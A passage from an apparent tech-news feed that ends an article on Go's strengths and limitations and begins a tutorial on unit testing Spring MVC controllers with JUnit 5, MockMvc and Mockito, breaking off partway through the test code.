<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2514123/8-reasons-developers-love-go-and-8-reasons-they-dont.html">8 reasons developers love Go—and 8 reasons they don’t</a>.</strong></p>



<h2 class="wp-block-heading">Optimal use cases for the Go language</h2>



<p class="wp-block-paragraph">No language is suited to every job, but some languages are suited to more jobs than others. Go shines brightest in cloud-native development projects, distributed network services, and for developing utilities and stand-alone tools. Let’s consider the qualities that make Go especially well-suited to each of these project types.</p>



<h3 class="wp-block-heading">Cloud-native development</h3>



<p class="wp-block-paragraph">Go’s concurrency and networking features, and its high degree of portability, make it well-suited for building cloud-native apps. In fact, Go was used to build several cornerstones of cloud-native computing including <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a>, <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, and <a href="https://www.infoworld.com/article/2258313/what-is-istio-the-kubernetes-service-mesh-explained.html">Istio</a>.</p>



<h3 class="wp-block-heading">Distributed network services</h3>



<p class="wp-block-paragraph">Network applications live and die by concurrency, and Go’s native concurrency features—<a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">goroutines</a> and <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">channels</a>, mainly—are well suited for such work. Consequently, many Go projects are for networking, distributed functions, and cloud services. These include <a href="https://github.com/go-goyave/goyave">APIs</a>, <a href="https://github.com/mholt/caddy">web servers</a>, <a href="https://github.com/claygod/microservice">Kubernetes-ready frameworks for microservices</a>, and much more.</p>



<h3 class="wp-block-heading">Utilities and standalone tools</h3>



<p class="wp-block-paragraph">Go programs compile to binaries with minimal external dependencies. That makes them ideally suited to creating utilities and other tools, because they launch quickly and can be readily packaged up for redistribution. One example is an <a href="https://goteleport.com/">access server called Teleport</a>, which can be deployed on servers quickly by compiling it from source or downloading a prebuilt binary.</p>



<h2 class="wp-block-heading">Limitations of the Go language</h2>



<p class="wp-block-paragraph">Now let’s consider some of the limitations of Go. For one, it omits many language features developers may desire. It also packs everything into its binaries, so Go programs can be large. Furthermore, <a href="https://www.infoworld.com/article/4041753/go-language-previews-performance-boosting-garbage-collector.html">Go’s garbage collection mechanism</a> delivers automatic memory management at the cost of absolute performance. The language also lacks a standard toolkit for building GUIs, and it is unsuited to systems programming.</p>



<p class="wp-block-paragraph">Let’s look at each of these issues in detail.</p>



<h3 class="wp-block-heading">Go omits many desirable language features</h3>



<p class="wp-block-paragraph">Go’s opinionated set of features draws both praise and criticism. Go is designed to err on the side of being small and easy to understand, with certain features deliberately omitted. The result is that some features that are commonplace in other languages simply aren’t available in Go. This is purposeful, but it’s still a drawback for some types of projects.</p>



<p class="wp-block-paragraph">One thing Go omits that you will find in other languages is <em>macros</em>, commonly defined as the ability to generate program code at compile time. C, C++, and (the rising star) <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a> all have macro systems. Go does not have macros, or at least not of the same variety as those languages. What Go does have is a tool command, <code>go generate</code>, which looks for magic comments in Go source and executes them. This can be used to generate Go source code, or even run other commands, but its main use is to programmatically generate code, usually as a precursor to the build process. (Technical blogger Eli Bendersky <a href="https://eli.thegreenplace.net/2021/a-comprehensive-guide-to-go-generate/">explains the ‘go generate’ command in detail</a>.)</p>



<p class="wp-block-paragraph">Another longstanding complaint with Go was, until recently, the lack of generic functions, which allow a function to accept many different types of variables. Go’s development team held out against adding generics to the language for many years because they wanted a syntax and set of behaviors that complemented the rest of Go. But as of <a href="https://tip.golang.org/doc/go1.18">Go 1.18</a>, released in early 2022, the language <a href="https://www.infoworld.com/article/2271612/get-started-with-generics-in-go.html">includes a syntax for generics</a>. Because <code>go generate</code> and its code-generation abilities emerged as one possible way to partially address the lack of generics, this functionality is no longer as commonly used in Go.</p>



<p class="wp-block-paragraph">The fact is that Go adds major language features rarely, and only after much consideration. This works to preserve broad compatibility across versions, but it comes at the cost of slower innovation.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3849417/what-you-need-to-know-about-go-rust-and-zig.html">What you need to know about Go, Rust, and Zig</a>.</strong></p>



<h3 class="wp-block-heading">Go’s binaries are large</h3>



<p class="wp-block-paragraph">Another potential downside to Go is the size of the generated binaries. Go binaries are statically compiled by default, meaning that everything needed at runtime is included in the binary image. This approach simplifies the build and deployment process, but at the cost of a simple “Hello, world!” weighing in at around 1.5MB on 64-bit Windows. The Go team has been <a href="https://blog.golang.org/go1.7-binary-size">working to reduce the size of those binaries</a> with each successive release. It is also possible to <a href="https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/">shrink Go binaries with compression</a> or by <a href="https://jamescun.com/golang/binary-size/">removing Go’s debug information</a>. This last option may work better for standalone distributed apps than for cloud or network services, where having debug information is useful if a service fails in place.</p>



<h3 class="wp-block-heading">Go’s garbage collection is resource hungry</h3>



<p class="wp-block-paragraph">Yet another touted feature of Go, automatic memory management, can be seen as a drawback, as garbage collection requires a certain amount of processing overhead. By design, Go <a href="https://golang.org/doc/faq#garbage_collection">doesn’t provide manual memory management</a>, and garbage collection in Go has been criticized for not dealing well with the kinds of memory loads that appear in enterprise applications.</p>



<p class="wp-block-paragraph">That said, each new version of Go seems to improve the memory management features. For example, Go 1.8 brought <a href="https://golang.org/doc/go1.8#gc">significantly shorter lag times for garbage collection</a>, and <a href="https://www.infoworld.com/article/4041753/go-language-previews-performance-boosting-garbage-collector.html">Go 1.25</a> introduced a new, experimental garbage collector. While Go developers can use manual memory allocation in a C extension, or by way of a <a href="https://github.com/joetifa2003/mm-go">third-party manual memory management library</a>, most prefer native solutions.</p>



<h3 class="wp-block-heading">Go doesn’t have a standard GUI toolkit</h3>



<p class="wp-block-paragraph">Most Go applications are command-line tools or network services. That said, various projects are working to bring rich GUIs for Go applications. There are bindings for the <a href="https://mattn.github.io/go-gtk/">GTK</a> and <a href="https://github.com/gotk3/gotk3">GTK3</a> frameworks. Another project is intended to provide <a href="https://github.com/richardwilkes/unison">platform-native UIs</a> across platforms, although it focuses on Go 1.24 forward only. But no clear winner or safe long-term bet has emerged in this space. Also, because Go is platform-independent by design, it is unlikely any project in this vein will become a part of the standard package set.</p>



<h3 class="wp-block-heading">You shouldn’t use Go for systems programming</h3>



<p class="wp-block-paragraph">Finally, although Go can talk to native system functions, it was not designed for developing low-level system components such as kernels, device drivers, or embedded systems. After all, the Go runtime and the garbage collector for Go applications are dependent on the underlying operating system. (Developers interested in a cutting-edge language for that kind of work might look into using <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a>.)</p>



<h2 class="wp-block-heading">The future of the Go language</h2>



<p class="wp-block-paragraph">Go’s development is turning more toward the wants and needs of its developer base, with Go’s minders changing the language to better accommodate this audience rather than leading by stubborn example. A case in point is generics, which were finally added to the language after much deliberation about the best way to do so.</p>



<p class="wp-block-paragraph">The <a href="https://www.infoworld.com/article/2336812/go-language-shines-for-ai-powered-workloads-survey-says.html">2024 Go Developer Survey</a> found developers were overall satisfied with Go. Challenges that surfaced were generally due to the verbosity of error handling, missing or immature frameworks, and using Go’s type system—areas ripe for future development.</p>



<p class="wp-block-paragraph">Like most languages, Go has gravitated to a core set of use cases over time, finding its niche in network services. In the future, Go is likely to continue expanding its hold there. Other use cases cited in the developer survey include creating APIs or RPC services (74% of respondents), followed by CLI applications (63%), web services (45%), libraries/frameworks (44%), automation (39%), and data processing (37%). While only 4% of respondents mentioned using Go to develop <a href="https://www.infoworld.com/artificial-intelligence/">AI technologies</a>, those who did reported that <a href="https://www.infoworld.com/article/2336812/go-language-shines-for-ai-powered-workloads-survey-says.html">Go was a strong platform for running AI-powered workloads in production</a>. For those wanting to develop ML/AI with Go, lack of tooling (23%) and the fact that Python is the default choice for such work (16%) topped the reasons why.</p>



<p class="wp-block-paragraph">It remains to be seen how far Go’s speed and development simplicity will take it into other use cases, especially those dominated by other languages and their existing use cases. Rust covers <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">safe and fast systems programming</a> (a space Go is unlikely to enter); Python is still a common default for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">ML/AI, prototyping, automation, and glue code</a>; and Java remains a stalwart for <a href="https://www.infoworld.com/java">enterprise applications</a>.</p>



<p class="wp-block-paragraph">But Go’s future as a major programming language is already assured—certainly in the cloud, where the speed and simplicity of Go ease the development of scalable infrastructure that can be maintained over the long run.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3607388/go-language-evolving-for-future-hardware-ai-workloads.html">Go language evolving for future hardware, AI workloads</a>.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unit testing Spring MVC applications with JUnit 5]]></title>
<description><![CDATA[Spring is a reliable and popular framework for building web and enterprise Java applications. In this article, you’ll learn how to unit test each layer of a Spring MVC application, using built-in testing tools from JUnit 5 and Spring to mock each component’s dependencies. In addition to unit test...]]></description>
<link>https://tsecurity.de/de/3665676/ai-nachrichten/unit-testing-spring-mvc-applications-with-junit-5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665676/ai-nachrichten/unit-testing-spring-mvc-applications-with-junit-5/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html" data-type="link" data-id="https://www.infoworld.com/article/4083578/a-fresh-look-at-the-spring-framework.html">Spring</a> is a reliable and popular framework for building web and enterprise <a href="https://www.infoworld.com/java/">Java</a> applications. In this article, you’ll learn how to unit test each layer of a Spring MVC application, using built-in testing tools from <a href="https://www.infoworld.com/article/3993538/how-to-test-your-java-applications-with-junit-5.html">JUnit 5</a> and Spring to mock each component’s dependencies. In addition to unit testing with MockMvc, Mockito, and Spring’s <code>TestEntityManager</code>, I’ll also briefly introduce slice testing using the <code>@WebMvcTest</code> and <code>@DataJpaTest</code> annotations, used to optimize unit tests on web controllers and databases.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3993538/how-to-test-your-java-applications-with-junit-5.html">How to test your Java applications with JUnit 5</a>.</strong></p>



<h2 class="wp-block-heading">Overview of testing Spring MVC applications</h2>



<p class="wp-block-paragraph">Spring MVC applications are defined using three technology layers:</p>



<ul class="wp-block-list">
<li><em>Controllers</em> accept web requests and return web responses.</li>



<li><em>Services</em> implement the application’s business logic.</li>



<li><em>Repositories</em> persist data to and from your back-end <a href="https://www.infoworld.com/article/2337457/sql-at-50-whats-next-for-the-structured-query-language.html">SQL</a> or <a href="https://www.infoworld.com/article/2260280/what-is-nosql-databases-for-a-cloud-scale-future.html">NoSQL</a> database.</li>
</ul>



<p class="wp-block-paragraph">When we unit test Spring MVC applications, we test each layer separately from the others. We create mock implementations, typically using <a href="https://site.mockito.org/">Mockito</a>, for each layer’s dependencies, then we simulate the logic we want to test. For example, a controller may call a service to retrieve a list of objects. When testing the controller, we create a mock service that either returns the list of objects, returns an empty list, or throws an exception. This test ensures the controller behaves correctly.</p>



<p class="wp-block-paragraph">We’ll use Spring MVC to build and test a simple web service that manages widgets. The structure of the web service is shown here:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/TestingSpringMVC-fig1.png?w=1024" alt="Diagram of a Spring MVC web service application." class="wp-image-4078126" width="1024" height="286" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Steven Haines</p></div>



<p class="wp-block-paragraph">This is a classic MVC pattern. We have a <em>widget controller</em> that handles <a href="https://www.infoworld.com/article/2334742/what-is-rest-the-de-facto-web-architecture-standard.html">RESTful requests</a> and delegates its business functionality to a <em>widget service</em>, which uses a <em>widget repository</em> to persist widgets to and from an in-memory H2 database.</p>



<p class="wp-block-paragraph"><strong>Get the source: <a href="https://b2b-contenthub.com/wp-content/uploads/2025/10/spring-mvc-unit-testing-iw.zip" data-type="link" data-id="https://b2b-contenthub.com/wp-content/uploads/2025/10/spring-mvc-unit-testing-iw.zip">Download the source code for this article</a>.</strong></p>



<h2 class="wp-block-heading">Unit testing a Spring MVC controller with MockMvc</h2>



<p class="wp-block-paragraph">Setting up a Spring MVC controller test is a two-step process:</p>



<ul class="wp-block-list">
<li>Annotate your test class with <code>@WebMvcTest</code>.</li>



<li>Autowire a <code>MockMvc</code> instance into your controller.</li>
</ul>



<p class="wp-block-paragraph">We could annotate all our test classes with <code>@SpringBootTest</code>, but we’ll use <code>@WebMvcTest</code> instead. The reason is that the <code>@WebMvcTest</code> annotation is used for <em>slice testing</em>. Whereas <code>@SpringBootTest</code> loads your entire Spring application context, <code>@WebMvcTest</code> loads only your web-related resources. Furthermore, if you specify a controller class in the annotation, it will only load the specific controller you want to test. Testing a single “slice” of your application reduces both the amount of compute resources required to set up the test and the time required to run a test.</p>



<p class="wp-block-paragraph">For example, when we test a controller, we’ll mock just the services it uses, and we won’t need any repositories at all. If we don’t need them, then we needn’t waste time loading them. Slice tests were created to make tests perform better and run faster.</p>



<p class="wp-block-paragraph">Here’s the source code for the <code>Widget</code> class we’ll be managing:</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.model;
import jakarta.persistence.Entity;
import jakarta.persistence.GeneratedValue;
import jakarta.persistence.GenerationType;
import jakarta.persistence.Id;

@Entity
public class Widget {
    @Id
    @GeneratedValue(strategy = GenerationType.AUTO)
    private Long id;
    private String name;
    private int version;

    public Widget() {
    }

    public Widget(String name) {
        this.name = name;
    }

    public Widget(String name, int version) {
        this.name = name;
        this.version = version;
    }

    public Widget(Long id, String name, int version) {
        this.id = id;
        this.name = name;
        this.version = version;
    }

    public Long getId() {
        return id;
    }

    public void setId(Long id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getVersion() {
        return version;
    }

    public void setVersion(int version) {
        this.version = version;
    }
}</code></pre>



<p class="wp-block-paragraph">A <code>Widget</code> is a <a href="https://www.infoworld.com/article/2259807/what-is-jpa-introduction-to-the-java-persistence-api.html">JPA entity</a> that manages three fields:</p>



<ul class="wp-block-list">
<li><em>id</em> is the primary key of the table, annotated with <code>@Id</code> and <code>@GeneratedValue</code>, with an automatic generation strategy.</li>



<li><em>name</em> is the name of the widget.</li>



<li><em>version</em> is the version of the widget resource. We’ll use this value to populate our <code>eTag</code> value and check it in our <code>PUT</code> operation’s <code>If-Match </code>header value. This ensures the widget being updated is not stale.</li>
</ul>



<p class="wp-block-paragraph">Here’s the source code for the controller we’ll be testing (<code>WidgetController.java</code>):</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.web;

import java.net.URI;
import java.net.URISyntaxException;
import java.util.List;
import java.util.Optional;
import com.infoworld.widgetservice.model.Widget;
import com.infoworld.widgetservice.service.WidgetService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.DeleteMapping;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.PutMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class WidgetController {
    @Autowired
    private WidgetService widgetService;
    @GetMapping("/widget/{id}")
    public ResponseEntity getWidget(@PathVariable Long id) {
        return widgetService.findById(id)
                .map(widget -&gt; {
                    try {
                        return ResponseEntity
                                .ok()
                                .location(new URI("/widget/" + id))
                                .eTag(Integer.toString(
                                               widget.getVersion()))
                                .body(widget);
                    } catch (URISyntaxException e) {
                        return ResponseEntity
                          .status(HttpStatus.INTERNAL_SERVER_ERROR)
                          .build();
                    }
                })
                .orElse(ResponseEntity.notFound().build());
    }
    @GetMapping("/widgets")
    public List getWidgets() {
        return widgetService.findAll();
    }
    @PostMapping("/widgets")
    public ResponseEntity createWidget(@RequestBody Widget widget)
    {
        Widget newWidget = widgetService.create(widget);
        try {
           return ResponseEntity
                   .created(new URI("/widget/" + newWidget.getId()))
                   .eTag(Integer.toString(newWidget.getVersion()))
                   .body(newWidget);
        } catch (URISyntaxException e) {
            return ResponseEntity
                    .status(HttpStatus.INTERNAL_SERVER_ERROR)
                    .build();
        }
    }

    @PutMapping("/widget/{id}")
    public ResponseEntity updateWidget(@PathVariable Long id,
                                          @RequestBody Widget widget,
                         @RequestHeader("If-Match") Integer ifMatch) {
        Optional existingWidget = widgetService.findById(id);
        return existingWidget.map(w -&gt; {
            if (w.getVersion() != ifMatch) {
                return ResponseEntity.status(HttpStatus.CONFLICT)
                                     .build();
            }

            w.setName(widget.getName());
            w.setVersion(w.getVersion() + 1);

            Widget updatedWidget = widgetService.save(w);
            try {
                return ResponseEntity.ok()
                        .location(new URI("/widget/" + 
                                      updatedWidget.getId()))
                        .eTag(Integer.toString(
                                      updatedWidget.getVersion()))
                        .body(updatedWidget);
            } catch (URISyntaxException e) {
                throw new RuntimeException(e);
            }
        }).orElse(ResponseEntity.notFound().build());
    }

    @DeleteMapping("widget/{id}")
    public ResponseEntity deleteWidget(@PathVariable Long id) {
        Optional existingWidget = widgetService.findById(id);
        return existingWidget.map(w -&gt; {
           widgetService.deleteById(w.getId());
           return ResponseEntity.ok().build();
        }).orElse(ResponseEntity.notFound().build());
    }
}</code></pre>



<p class="wp-block-paragraph">The <code>WidgetController</code> handles <code>GET</code>, <code>POST</code>, <code>PUT</code>, and <code>DELETE</code> operations, following standard RESTful principles, so we’re going to write tests for each operation.</p>



<p class="wp-block-paragraph">The following source code shows the structure of our test class (<code>WidgetControllerTest.java</code>):</p>



<pre class="wp-block-code"><code>package com.infoworld.widgetservice.web;

@WebMvcTest(WidgetController.class)
public class WidgetControllerTest {
    @Autowired
    private MockMvc mockMvc;

    @MockitoBean
    private WidgetService widgetService;
}</code></pre>



<p class="wp-block-paragraph">I omitted the imports for readability, but the important thing to note is that the class is annotated with the <code>@WebMvcTest</code> annotation, and that we pass in the <code>WidgetController.class</code> as the controller we’re testing. This tells Spring to only load the <code>WidgetController</code> and no other Spring resources. The <code>@WebMvcTest</code> annotation includes other annotations, but the important one for our tests is <code>@AutoConfigureMockMvc</code>, which will cause Spring to create a <code>MockMvc</code> instance and add it to the application context. That lets us autowire it into our test class using the <code>@Autowired</code> annotation.</p>



<p class="wp-block-paragraph">Next, we use the <code>@MockitoBean</code> annotation to use Mockito to create a mock implementation of the <code>WidgetService</code>, after which Spring will autowire it into the <code>WidgetController</code> class. This lets us control the behavior of the <code>WidgetService</code> for the <code>WidgetController</code> test cases we’re writing. Note that starting in Spring Boot version 3.4, <code>@MockitoBean</code> replaced <code>@MockBean</code>. Everything you know about <code>@MockBean</code> translates to using <code>@MockitoBean</code>—with some improvements.</p>



<h3 class="wp-block-heading">Unit testing GET /widgets</h3>



<p class="wp-block-paragraph">Let’s start with the easiest test case, a test for <code>GET /widgets</code>:</p>



<pre class="wp-block-code"><code>@Test
void testGetWidgets() throws Exception {
    List widgets = new ArrayList();
    widgets.add(new Widget(1L, "Widget 1", 1));
    widgets.add(new Widget(2L, "Widget 2", 1));
    widgets.add(new Widget(3L, "Widget 3", 1));

    when(widgetService.findAll()).thenReturn(widgets);

    mockMvc.perform(get("/widgets"))
            .andExpect(status().isOk())
            .andExpect(jsonPath("$.length()").value(3))
            .andExpect(jsonPath("$[0].id").value(1L))
            .andExpect(jsonPath("$[0].name").value("Widget 1"))
            .andExpect(jsonPath("$[0].version").value(1));
};</code></pre>



<p class="wp-block-paragraph">The <code>testGetWidgets()</code> method creates a list of three widgets and then configures the mock <code>WidgetService</code> to return the list when its <code>findAll()</code> method is called. The <code>WidgetControllerTest</code> class statically imports the <code>org.mockito.Mockito.when()</code> method that accepts a method call, which in this case is <code>widgetService.findAll()</code>, and returns a Mockito <code>OngoingStubbing</code> instance. This <code>OngoingStubbing</code> instance exposes methods like <code>thenReturn()</code>, <code>thenThrow()</code>, <code>thenCallRealMethod()</code>, <code>thenAnswer()</code>, and <code>then()</code>.</p>



<p class="wp-block-paragraph">Here, we use the <code>thenReturn()</code> method to tell Mockito to return the list of widgets when the <code>WidgetService</code>’s <code>findAll()</code> method is called. The <code>@MockitoBean</code> annotation causes the mock <code>WidgetService</code> to be autowired into the <code>WidgetController</code>. So, when the <code>getWidgets()</code> method is called in response to a <code>GET /widgets</code>, it calls the <code>WidgetService</code>’s <code>findAll()</code> method and returns our list of widgets as a web response.</p>



<p class="wp-block-paragraph">Next, we use <code>MockMvc</code>’s <code>perform()</code> method to execute a web request. This diagram shows the various classes that interact with the  <code>perform()</code> method:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/10/TestingSpringMVC-fig2.png?w=1024" alt="Diagram of classes that interact with the MockMvc perform() method." class="wp-image-4078130" width="1024" height="439" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Steven Haines</p></div>



<p class="wp-block-paragraph">The <code>perform()</code> method accepts a <code>RequestBuilder</code>. Spring defines several built-in <code>RequestBuilder</code>s that we can statically import into our tests, including <code>get()</code>, <code>post()</code>, <code>put()</code>, and <code>delete()</code>. The <code>perform()</code> method returns a <code>ResultActions</code> instance that exposes methods such as <code>andExpect()</code>, <code>andExpectAll()</code>, <code>andDo()</code>, and <code>andReturn()</code>. Here, we invoke the <code>andExpect()</code> method, which accepts a <code>ResultMatcher</code>. </p>



<p class="wp-block-paragraph">A <code>ResultMatcher</code> defines a<code> match()</code> method that throws an <code>AssertionError</code> if the assertion fails. Spring defines several <code>ResultMatcher</code>s that we can statically import:</p>



<ul class="wp-block-list">
<li><code>status()</code> allows us to check the HTTP status code of response.</li>



<li><code>content()</code> allows us to check the content headers of the response, such as <code>Content-Type</code>.</li>



<li><code>header()</code> allows us to check any of the HTTP header values.</li>



<li><code>jsonPath()</code> allows us to inspect the contents of a <a href="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html" data-type="link" data-id="https://www.infoworld.com/article/2255837/what-is-json-a-better-format-for-data-exchange.html">JSON document</a>.</li>
</ul>



<p class="wp-block-paragraph">After MockMvc performs a <code>GET to /widgets</code>, we expect the HTTP status code to be <code>200 OK</code>.  We can then use the <code>jsonPath</code> matcher to check the body results, using the following JSON path expressions:</p>



<ul class="wp-block-list">
<li><code>$.length()</code>: The <code>$</code> references the root of the JSON document. If the response is a list, then we can call the <code>length()</code> method to get the number of elements in the list.</li>



<li><code>$[0].id</code>: JSON path expressions for a list use an array syntax starting at 0. This expression gets the ID of the first element in the list.</li>



<li><code>$[0].name</code>: This expression gets the name of the first element and compares it to “<code>Widget 1</code>”.</li>



<li><code>$[0].version</code>: This expression gets the version of the first element and compares it to 1.</li>
</ul>



<h3 class="wp-block-heading">Unit testing the GET /widget/{id} handler</h3>



<p class="wp-block-paragraph">Here’s the source code to test the <code>GET /coffee/{id}</code> widget:</p>



<pre class="wp-block-code"><code>@Test
void testGetWidgetById() throws Exception {
    Widget widget = new Widget(1L, "My Widget", 1);          
    when(widgetService.findById(1L))
           .thenReturn(Optional.of(widget));

    mockMvc.perform(get("/widget/{id}", 1))
            // Validate that we get a 200 OK Response Code
            .andExpect(status().isOk())

            // Validate Headers
            .andExpect(content()
                      .contentType(MediaType.APPLICATION_JSON))
            .andExpect(header().string(HttpHeaders.LOCATION,
                                       "/widget/1"))
            .andExpect(header().string(HttpHeaders.ETAG, "\"1\""))

            // Validate content
            .andExpect(jsonPath("$.id").value(1L))
            .andExpect(jsonPath("$.name").value("My Widget"))
            .andExpect(jsonPath("$.version").value(1));
 }</code></pre>



<p class="wp-block-paragraph">This test method is very similar to the <code>testGetWidgets()</code> method, but with some notable changes:</p>



<ul class="wp-block-list">
<li>The <code>GET</code> URI is defined using a URI template. You can specify any number of variables enclosed in braces in the URI template and then send a list of arguments that will replace those variables in the order they appear in the template.</li>



<li>We check that the returned <code>Content-Type</code> is <code>“application/json”</code>, which is a constant in the <code>MediaType</code> class. We access the content using the <code>content()</code> method, which returns a <code>ContentResultMatchers</code> instance that provides various methods, including <code>contentType()</code>, which allows us to validate the content headers.</li>



<li>We check for specific header values using the <code>header()</code> method. The <code>header()</code> method returns a <code>HeadersResultMatchers</code> instance, which can check for header <code>String</code>, <code>long</code>, and <code>date</code> values, as well as checking to see whether or not specific headers exist. In this case, we use constants defined in the <code>HttpHeaders</code> class to check the <code>location</code> and <code>eTag</code> header values.</li>



<li>We check the body of the response using JSON path expressions. In this case, we do not have a list of objects, so we can access the individual fields in the JSON document directly. For example, <code>$.id</code> retrieves the <code>id</code> field value in the root of the document.</li>
</ul>



<h3 class="wp-block-heading">Unit testing a GET /widget/{id} Not Found code</h3>



<p class="wp-block-paragraph">Next, we test the <code>GET /widget/{id}</code>, passing it an invalid ID so that it returns a 404 Not Found response code:</p>



<pre class="wp-block-code"><code>@Test
void testGetWidgetByIdNotFound() throws Exception {
   when(widgetService.findById(1L)).thenReturn(Optional.empty());

   mockMvc.perform(get("/widget/{id}", 1))
            // Validate that we get a 404 Not Found Response Code
            .andExpect(status().isNotFound());
}</code></pre>



<p class="wp-block-paragraph">The <code>testGetWidgetByIdNotFound()</code> method configures the mock <code>WidgetService</code> to return <code>Optional.empty()</code> when its <code>findById()</code> is called with a value of 1. We then perform a <code>GET</code> request to <code>/widget/1</code>, then assert that the returned HTTP status code is 404 Not Found.</p>



<h3 class="wp-block-heading">Unit testing POST /widgets</h3>



<p class="wp-block-paragraph">Here’s how to test a <code>Widget</code> creation:</p>



<pre class="wp-block-code"><code>@Test
void testCreateWidget() throws Exception {
    Widget widget = new Widget(1L, "Widget 1", 1);
    when(widgetService.create(any())).thenReturn(widget);

    mockMvc.perform(post("/widgets")
            .contentType(MediaType.APPLICATION_JSON)
            .content("{\"name\": \"Widget 1\"}"))

            // Validate that we get a 201 Created Response Code
            .andExpect(status().isCreated())

            // Validate Headers
            .andExpect(content().contentType(
                                      MediaType.APPLICATION_JSON))
            .andExpect(header().string(HttpHeaders.LOCATION, 
                                       "/widget/1"))
            .andExpect(header().string(HttpHeaders.ETAG, "\"1\""))

            // Validate content
            .andExpect(jsonPath("$.id").value(1L))
            .andExpect(jsonPath("$.name").value("Widget 1"))
            .andExpect(jsonPath("$.version").value(1));</code></pre>



<p class="wp-block-paragraph">The <code>testCreateWidget()</code> method first creates a <code>Widget</code> to return when the <code>WidgetService</code>’s <code>create()</code> method is called with any argument. The <code>any()</code> matcher matches any argument and, because the <code>createWidget()</code> handler will create a new <code>Widget</code> instance, we will not have access to that instance when the test runs. We then invoke MockMvc’s <code>perform()</code> method to the <code>”/widgets”</code> URI, sending the content body of a new widget named <code>“Widget 1”</code>, using the <code>content()</code> method. We expect a 201 Created HTTP response code, an “<code>application/json</code>” content type, a location header of “<code>/widget/1</code>”, and an <code>eTag</code> value of the <code>String</code> “<code>1</code>”. The body of the response should match the <code>Widget</code> we returned from the <code>create()</code> method, namely an ID of 1, a name of “Widget 1”, and a version of 1.</p>



<h3 class="wp-block-heading">Unit testing PUT /widget</h3>



<p class="wp-block-paragraph">This code runs three tests for the <code>PUT</code> operation:</p>



<pre class="wp-block-code"><code>@Test
public void testSuccessfulUpdate() throws Exception {
    // Create a mock Widget when the WidgetService's findById(1L) 
    // is called
    Widget mockWidget = new Widget(1L, "Widget 1", 5);
    when(widgetService.findById(1L))
                      .thenReturn(Optional.of(mockWidget));

    // Create a mock Coffee that is returned when the 
    // CoffeeController saves the Coffee to the database
    Widget savedWidget = new Widget(1L, "Updated Widget 1", 6);
    when(widgetService.save(any())).thenReturn(savedWidget);

    // Execute a PUT /widget/1 with a matching version: 5
    mockMvc.perform(put("/widget/{id}", 1L)
                    .contentType(MediaType.APPLICATION_JSON)
                    .header(HttpHeaders.IF_MATCH, 5)
                    .content("{\"id\": 1, " +
                             "\"name\": \"Updated Widget 1\"}"))

            // Validate that we get a 200 OK HTTP Response
           .andExpect(status().isOk())

            // Validate the headers
           .andExpect(content()
                        .contentType(MediaType.APPLICATION_JSON))
           .andExpect(header().string(HttpHeaders.LOCATION, 
                                      "/widget/1"))
           .andExpect(header().string(HttpHeaders.ETAG, "\"6\""))

           // Validate the contents of the response
           .andExpect(jsonPath("$.id").value(1L))
           .andExpect(jsonPath("$.name")
                               .value("Updated Widget 1"))
           .andExpect(jsonPath("$.version").value(6));
}

@Test
public void testUpdateConflict() throws Exception {
   // Create a mock coffee with a version set to 5
   Widget mockWidget = new Widget(1L, "Widget 1", 5);

    // Return the mock Coffee when the CoffeeService's 
    // findById(1L) is called
    when(widgetService.findById(1L))
                      .thenReturn(Optional.of(mockWidget));

    // Execute a PUT /widget/1 with a mismatched version number: 2
    mockMvc.perform(put("/widget/{id}", 1L)
                    .contentType(MediaType.APPLICATION_JSON)
                    .header(HttpHeaders.IF_MATCH, 2)
                    .content("{\"id\": 1, " + 
                             "\"name\":  \"Updated Widget 1\"}"))
             // Validate that we get a 409 Conflict HTTP Response
            .andExpect(status().isConflict());
}

@Test
public void testUpdateNotFound() throws Exception {
   // Return the mock Coffee when the CoffeeService's 
   // findById(1L) is called
